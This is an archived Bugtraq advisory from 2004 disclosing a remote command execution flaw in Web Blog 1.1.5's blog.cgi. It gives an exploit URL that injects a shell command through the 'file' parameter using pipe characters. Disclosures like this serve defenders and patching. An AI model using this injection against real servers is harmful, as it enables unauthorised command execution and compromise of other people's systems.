Web Blog 1.1 Remote Execute Commands Bug

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

To: bugtraq@securityfocus.com
Subject: Web Blog 1.1 Remote Execute Commands Bug
From: ActualMInd <actualmind@liberdadeaffix.org>
Date: Thu, 29 Jan 2004 23:41:42 +0300
User-agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030915

Product:
Web Blog 1.1 Remote Execute Commands Bug

Affected Versions:
1.1.5

Bug:
Command Remote Execution

Credits:
n3rd - Lit Security Solutions (LiSS)
#Affix in irc.brasnet.org

Vendor:
http://leifwright.com

Exploiting: http://address/directory/blog.cgi?submit=ViewFile&month=[month]&year=[year]&file=|command|

Prev by Date: Re: RFC: virus handling
Next by Date: Re: Fw: phpBB privmsg.php XSS vulnerability patch.
Previous by thread: BUG IN APACHE HTTPD SERVER (current version 2.0.47)
Next by thread: ZH2004-03SA (security advisory): Photopost PHP Pro 4.6 Sql Injection Vulnerability
Index(es):
- Date
- Thread

[Index of Archives] [Linux Security] [Netfilter] [PHP] [Yosemite News] [Linux Kernel]

Powered by Linux